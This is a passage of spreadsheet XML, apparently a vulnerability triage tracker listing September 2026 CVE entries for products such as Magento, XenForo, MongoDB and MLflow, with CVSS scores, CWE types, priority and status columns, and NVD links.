r="S268" s="5" t="inlineStr"><is><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is></c><c r="T268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t></is></c></row><row r="269"><c r="A269" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C269" s="5" t="inlineStr"><is><t>CVE-2026-62650</t></is></c><c r="D269" s="5" t="n"><v>8.699999999999999</v></c><c r="E269" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F269" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G269" s="5" t="inlineStr" /><c r="H269" s="5" t="n"><v>0.003</v></c><c r="I269" s="5" t="inlineStr" /><c r="J269" s="5" t="inlineStr" /><c r="K269" s="5" t="inlineStr" /><c r="L269" s="5" t="inlineStr" /><c r="M269" s="5" t="inlineStr" /><c r="N269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q269" s="5" t="inlineStr" /><c r="R269" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S269" s="5" t="inlineStr"><is><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is></c><c r="T269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t></is></c></row><row r="270"><c r="A270" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C270" s="5" t="inlineStr"><is><t>CVE-2026-73314</t></is></c><c r="D270" s="5" t="n"><v>8.699999999999999</v></c><c r="E270" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F270" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G270" s="5" t="inlineStr" /><c r="H270" s="5" t="n"><v>0.005</v></c><c r="I270" s="5" t="inlineStr" /><c r="J270" s="5" t="inlineStr" /><c r="K270" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L270" s="5" t="inlineStr" /><c r="M270" s="5" t="inlineStr" /><c r="N270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P270" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q270" s="5" t="inlineStr" /><c r="R270" s="5" t="inlineStr"><is><t>CWE-754</t></is></c><c r="S270" s="5" t="inlineStr"><is><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is></c><c r="T270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t></is></c></row><row r="271"><c r="A271" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C271" s="5" t="inlineStr"><is><t>CVE-2026-73316</t></is></c><c r="D271" s="5" t="n"><v>8.699999999999999</v></c><c r="E271" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F271" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G271" s="5" t="inlineStr" /><c r="H271" s="5" t="n"><v>0.002</v></c><c r="I271" s="5" t="inlineStr" /><c r="J271" s="5" t="inlineStr" /><c r="K271" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L271" s="5" t="inlineStr" /><c r="M271" s="5" t="inlineStr" /><c r="N271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P271" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q271" s="5" t="inlineStr" /><c r="R271" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="S271" s="5" t="inlineStr"><is><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is></c><c r="T271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t></is></c></row><row r="272"><c r="A272" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C272" s="5" t="inlineStr"><is><t>CVE-2026-77111</t></is></c><c r="D272" s="5" t="n"><v>8.699999999999999</v></c><c r="E272" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F272" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G272" s="5" t="inlineStr" /><c r="H272" s="5" t="n"><v>0.005</v></c><c r="I272" s="5" t="inlineStr" /><c r="J272" s="5" t="inlineStr" /><c r="K272" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L272" s="5" t="inlineStr" /><c r="M272" s="5" t="inlineStr" /><c r="N272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P272" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q272" s="5" t="inlineStr" /><c r="R272" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S272" s="5" t="inlineStr"><is><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is></c><c r="T272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t></is></c></row><row r="273"><c r="A273" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C273" s="5" t="inlineStr"><is><t>CVE-2026-80219</t></is></c><c r="D273" s="5" t="n"><v>8.699999999999999</v></c><c r="E273" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G273" s="5" t="inlineStr" /><c r="H273" s="5" t="n"><v>0.002</v></c><c r="I273" s="5" t="inlineStr" /><c r="J273" s="5" t="inlineStr" /><c r="K273" s="5" t="inlineStr" /><c r="L273" s="5" t="inlineStr" /><c r="M273" s="5" t="inlineStr" /><c r="N273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P273" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q273" s="5" t="inlineStr" /><c r="R273" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S273" s="5" t="inlineStr"><is><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is></c><c r="T273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t></is></c></row><row r="274"><c r="A274" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C274" s="5" t="inlineStr"><is><t>CVE-2026-82064</t></is></c><c r="D274" s="5" t="n"><v>8.699999999999999</v></c><c r="E274" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F274" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G274" s="5" t="inlineStr" /><c r="H274" s="5" t="n"><v>0.003</v></c><c r="I274" s="5" t="inlineStr" /><c r="J274" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K274" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L274" s="5" t="inlineStr" /><c r="M274" s="5" t="inlineStr" /><c r="N274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P274" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q274" s="5" t="inlineStr" /><c r="R274" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S274" s="5" t="inlineStr"><is><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is></c><c r="T274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t></is></c></row><row r="275"><c r="A275" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C275" s="5" t="inlineStr"><is><t>CVE-2026-82075</t></is></c><c r="D275" s="5" t="n"><v>8.699999999999999</v></c><c r="E275" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F275" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G275" s="5" t="inlineStr" /><c r="H275" s="5" t="n"><v>0.003</v></c><c r="I275" s="5" t="inlineStr" /><c r="J275" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K275" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L275" s="5" t="inlineStr" /><c r="M275" s="5" t="inlineStr" /><c r="N275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P275" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q275" s="5" t="inlineStr" /><c r="R275" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S275" s="5" t="inlineStr"><is><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is></c><c r="T275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t></is></c></row><row r="276"><c r="A276" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C276" s="5" t="inlineStr"><is><t>CVE-2026-86727</t></is></c><c r="D276" s="5" t="n"><v>8.699999999999999</v></c><c r="E276" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F276" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G276" s="5" t="inlineStr" /><c r="H276" s="5" t="n"><v>0.003</v></c><c r="I276" s="5" t="inlineStr" /><c r="J276" s="5" t="inlineStr" /><c r="K276" s="5" t="inlineStr" /><c r="L276" s="5" t="inlineStr" /><c r="M276" s="5" t="inlineStr" /><c r="N276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P276" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q276" s="5" t="inlineStr" /><c r="R276" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S276" s="5" t="inlineStr"><is><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is></c><c r="T276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t></is></c></row><row r="277"><c r="A277" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C277" s="5" t="inlineStr"><is><t>CVE-2026-86732</t></is></c><c r="D277" s="5" t="n"><v>8.699999999999999</v></c><c r="E277" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F277" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G277" s="5" t="inlineStr" /><c r="H277" s="5" t="n"><v>0.005</v></c><c r="I277" s="5" t="inlineStr" /><c r="J277" s="5" t="inlineStr" /><c r="K277" s="5" t="inlineStr" /><c r="L277" s="5" t="inlineStr" /><c r="M277" s="5" t="inlineStr" /><c r="N277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P277" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q277" s="5" t="inlineStr" /><c r="R277" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S277" s="5" t="inlineStr"><is><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is></c><c r="T277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t></is></c></row><row r="278"><c r="A278" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C278" s="5" t="inlineStr"><is><t>CVE-2026-86738</t></is></c><c r="D278" s="5" t="n"><v>8.699999999999999</v></c><c r="E278" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G278" s="5" t="inlineStr" /><c r="H278" s="5" t="n"><v>0.003</v></c><c r="I278" s="5" t="inlineStr" /><c r="J278" s="5" t="inlineStr" /><c r="K278" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L278" s="5" t="inlineStr" /><c r="M278" s="5" t="inlineStr" /><c r="N278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P278" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q278" s="5" t="inlineStr" /><c r="R278" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S278" s="5" t="inlineStr"><is><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is></c><c r="T278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t></is></c></row><row r="279"><c r="A279" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C279" s="5" t="inlineStr"><is><t>CVE-2026-34223</t></is></c><c r="D279" s="5" t="n"><v>8.6</v></c><c r="E279" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F279" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G279" s="5" t="inlineStr" /><c r="H279" s="5" t="n"><v>0.001</v></c><c r="I279" s="5" t="inlineStr" /><c r="J279" s="5" t="inlineStr" /><c r="K279" s="5" t="inlineStr" /><c r="L279" s="5" t="inlineStr" /><c r="M279" s="5" t="inlineStr" /><c r="N279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P279" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q279" s="5" t="inlineStr" /><c r="R279" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S279" s="5" t="inlineStr"><is><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is></c><c r="T279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t></is></c></row><row r="280"><c r="A280" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C280" s="5" t="inlineStr"><is><t>CVE-2026-61517</t></is></c><c r="D280" s="5" t="n"><v>8.6</v></c><c r="E280" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F280" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G280" s="5" t="inlineStr" /><c r="H280" s="5" t="n"><v>0.016</v></c><c r="I280" s="5" t="inlineStr" /><c r="J280" s="5" t="inlineStr" /><c r="K280" s="5" t="inlineStr" /><c r="L280" s="5" t="inlineStr" /><c r="M280" s="5" t="inlineStr" /><c r="N280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P280" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q280" s="5" t="inlineStr" /><c r="R280" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S280" s="5" t="inlineStr"><is><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is></c><c r="T280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t></is></c></row><row r="281"><c r="A281" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C281" s="5" t="inlineStr"><is><t>CVE-2026-74239</t></is></c><c r="D281" s="5" t="n"><v>8.6</v></c><c r="E281" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F281" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G281" s="5" t="inlineStr" /><c r="H281" s="5" t="n"><v>0.007</v></c><c r="I281" s="5" t="inlineStr" /><c r="J281" s="5" t="inlineStr" /><c r="K281" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L281" s="5" t="inlineStr" /><c r="M281" s="5" t="inlineStr" /><c r="N281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P281" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q281" s="5" t="inlineStr" /><c r="R281" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S281" s="5" t="inlineStr"><is><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is></c><c r="T281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t></is></c></row><row r="282"><c r="A282" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C282" s="5" t="inlineStr"><is><t>CVE-2026-75990</t></is></c><c r="D282" s="5" t="n"><v>8.6</v></c><c r="E282" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F282" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G282" s="5" t="inlineStr" /><c r="H282" s="5" t="n"><v>0.002</v></c><c r="I282" s="5" t="inlineStr" /><c r="J282" s="5" t="inlineStr" /><c r="K282" s="5" t="inlineStr" /><c r="L282" s="5" t="inlineStr" /><c r="M282" s="5" t="inlineStr" /><c r="N282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P282" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q282" s="5" t="inlineStr" /><c r="R282" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S282" s="5" t="inlineStr"><is><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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t></is></c></row><row r="283"><c r="A283" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C283" s="5" t="inlineStr"><is><t>CVE-2026-75991</t></is></c><c r="D283" s="5" t="n"><v>8.6</v></c><c r="E283" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F283" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G283" s="5" t="inlineStr" /><c r="H283" s="5" t="n"><v>0.002</v></c><c r="I283" s="5" t="inlineStr" /><c r="J283" s="5" t="inlineStr" /><c r="K283" s="5" t="inlineStr" /><c r="L283" s="5" t="inlineStr" /><c r="M283" s="5" t="inlineStr" /><c r="N283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P283" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q283" s="5" t="inlineStr" /><c r="R283" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S283" s="5" t="inlineStr"><is><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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t></is></c></row><row r="284"><c r="A284" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C284" s="5" t="inlineStr"><is><t>CVE-2026-76190</t></is></c><c r="D284" s="5" t="n"><v>8.6</v></c><c r="E284" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F284" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G284" s="5" t="inlineStr" /><c r="H284" s="5" t="n"><v>0.01</v></c><c r="I284" s="5" t="inlineStr" /><c r="J284" s="5" t="inlineStr" /><c r="K284" s="5" t="inlineStr" /><c r="L284" s="5" t="inlineStr" /><c r="M284" s="5" t="inlineStr" /><c r="N284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P284" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q284" s="5" t="inlineStr" /><c r="R284" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S284" s="5" t="inlineStr"><is><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is></c><c r="T284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t></is></c></row><row r="285"><c r="A285" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C285" s="5" t="inlineStr"><is><t>CVE-2026-76199</t></is></c><c r="D285" s="5" t="n"><v>8.6</v></c><c r="E285" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F285" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G285" s="5" t="inlineStr" /><c r="H285" s="5" t="n"><v>0.002</v></c><c r="I285" s="5" t="inlineStr" /><c r="J285" s="5" t="inlineStr" /><c r="K285" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L285" s="5" t="inlineStr" /><c r="M285" s="5" t="inlineStr" /><c r="N285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P285" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q285" s="5" t="inlineStr" /><c r="R285" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="S285" s="5" t="inlineStr"><is><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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t></is></c></row><row r="286"><c r="A286" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C286" s="5" t="inlineStr"><is><t>CVE-2026-77109</t></is></c><c r="D286" s="5" t="n"><v>8.6</v></c><c r="E286" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F286" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G286" s="5" t="inlineStr" /><c r="H286" s="5" t="n"><v>0.004</v></c><c r="I286" s="5" t="inlineStr" /><c r="J286" s="5" t="inlineStr" /><c r="K286" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L286" s="5" t="inlineStr" /><c r="M286" s="5" t="inlineStr" /><c r="N286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P286" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q286" s="5" t="inlineStr" /><c r="R286" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S286" s="5" t="inlineStr"><is><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is></c><c r="T286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t></is></c></row><row r="287"><c r="A287" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C287" s="5" t="inlineStr"><is><t>CVE-2026-77774</t></is></c><c r="D287" s="5" t="n"><v>8.6</v></c><c r="E287" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G287" s="5" t="inlineStr" /><c r="H287" s="5" t="n"><v>0.005</v></c><c r="I287" s="5" t="inlineStr" /><c r="J287" s="5" t="inlineStr" /><c r="K287" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L287" s="5" t="inlineStr" /><c r="M287" s="5" t="inlineStr" /><c r="N287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P287" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q287" s="5" t="inlineStr" /><c r="R287" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S287" s="5" t="inlineStr"><is><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is></c><c r="T287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t></is></c></row><row r="288"><c r="A288" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C288" s="5" t="inlineStr"><is><t>CVE-2026-79721</t></is></c><c r="D288" s="5" t="n"><v>8.6</v></c><c r="E288" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F288" s="5" t="inlineStr"><is><t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t></is></c><c r="G288" s="5" t="inlineStr" /><c r="H288" s="5" t="n"><v>0.003</v></c><c r="I288" s="5" t="inlineStr" /><c r="J288" s="5" t="inlineStr" /><c r="K288" s="5" t="inlineStr" /><c r="L288" s="5" t="inlineStr" /><c r="M288" s="5" t="inlineStr" /><c r="N288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P288" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q288" s="5" t="inlineStr" /><c r="R288" s="5" t="inlineStr"><is><t>CWE-829</t></is></c><c r="S288" s="5" t="inlineStr"><is><t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t></is></c><c r="T288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t></is></c></row><row r="289"><c r="A289" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C289" s="5" t="inlineStr"><is><t>CVE-2026-80097</t></is></c><c r="D289" s="5" t="n"><v>8.6</v></c><c r="E289" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F289" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G289" s="5" t="inlineStr" /><c r="H289" s="5" t="n"><v>0.004</v></c><c r="I289" s="5" t="inlineStr" /><c r="J289" s="5" t="inlineStr" /><c r="K289" s="5" t="inlineStr" /><c r="L289" s="5" t="inlineStr" /><c r="M289" s="5" t="inlineStr" /><c r="N289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P289" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q289" s="5" t="inlineStr" /><c r="R289" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S289" s="5" t="inlineStr"><is><t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t></is></c></row><row r="290"><c r="A290" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C290" s="5" t="inlineStr"><is><t>CVE-2026-86509</t></is></c><c r="D290" s="5" t="n"><v>8.6</v></c><c r="E290" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F290" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G290" s="5" t="inlineStr" /><c r="H290" s="5" t="n"><v>0.004</v></c><c r="I290" s="5" t="inlineStr" /><c r="J290" s="5" t="inlineStr" /><c r="K290" s="5" t="inlineStr" /><c r="L290" s="5" t="inlineStr" /><c r="M290" s="5" t="inlineStr" /><c r="N290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P290" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q290" s="5" t="inlineStr" /><c r="R290" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="S290" s="5" t="inlineStr"><is><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is></c><c r="T290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t></is></c></row><row r="291"><c r="A291" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C291" s="5" t="inlineStr"><is><t>CVE-2026-86510</t></is></c><c r="D291" s="5" t="n"><v>8.6</v></c><c r="E291" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F291" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G291" s="5" t="inlineStr" /><c r="H291" s="5" t="n"><v>0.005</v></c><c r="I291" s="5" t="inlineStr" /><c r="J291" s="5" t="inlineStr" /><c r="K291" s="5" t="inlineStr" /><c r="L291" s="5" t="inlineStr" /><c r="M291" s="5" t="inlineStr" /><c r="N291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q291" s="5" t="inlineStr" /><c r="R291" s="5" t="inlineStr"><is><t>CWE-119, CWE-787</t></is></c><c r="S291" s="5" t="inlineStr"><is><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is></c><c r="T291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t></is></c></row><row r="292"><c r="A292" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C292" s="5" t="inlineStr"><is><t>CVE-2026-86712</t></is></c><c r="D292" s="5" t="n"><v>8.6</v></c><c r="E292" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F292" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G292" s="5" t="inlineStr" /><c r="H292" s="5" t="n"><v>0.004</v></c><c r="I292" s="5" t="inlineStr" /><c r="J292" s="5" t="inlineStr" /><c r="K292" s="5" t="inlineStr" /><c r="L292" s="5" t="inlineStr" /><c r="M292" s="5" t="inlineStr" /><c r="N292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P292" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q292" s="5" t="inlineStr" /><c r="R292" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S292" s="5" t="inlineStr"><is><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is></c><c r="T292" s="6" 